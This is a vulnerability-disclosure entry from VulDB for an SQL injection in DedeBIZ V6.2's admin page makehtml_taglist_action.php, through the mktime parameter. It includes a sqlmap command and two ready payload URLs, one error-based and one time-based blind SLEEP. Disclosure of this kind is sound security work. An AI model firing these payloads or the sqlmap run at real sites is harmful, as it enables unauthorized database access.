makehtml_taglist_action.phpinformação

Título	SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php
Descrição	[Suggested description] SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php [Vulnerability Type] SQL INJECTION [Vendor of Product] https://github.com/DedeBIZ/DedeV6 [Affected Product Code Base] DedeBIZ V6.2 [Affected Component] File： /src/admin/makehtml_taglist_action.php Parameter： mktime python sqlmap.py -r sql.txt --current-db Parameter: #1* (URI) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND GTID_SUBSET(CONCAT(0x716b787871,(SELECT (ELT(2192=2192,1))),0x716b7a6a71),2192) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND (SELECT 9884 FROM (SELECT(SLEEP(5)))NySf) [Attack Type] Remote
Fonte	⚠️ https://github.com/yhy217/dedebiz--vul/issues/2
Utilizador	jamspilly (UID 54414)
Submissão	21/09/2023 11h20 (há 3 anos)
Moderação	29/09/2023 08h01 (8 days later)
Estado	Aceite
Entrada VulDB	240881 [DedeBIZ 6.2 makehtml_taglist_action.php mktime Injeção SQL]
Pontos	20

Might our Artificial Intelligence support you?

Check our Alexa App!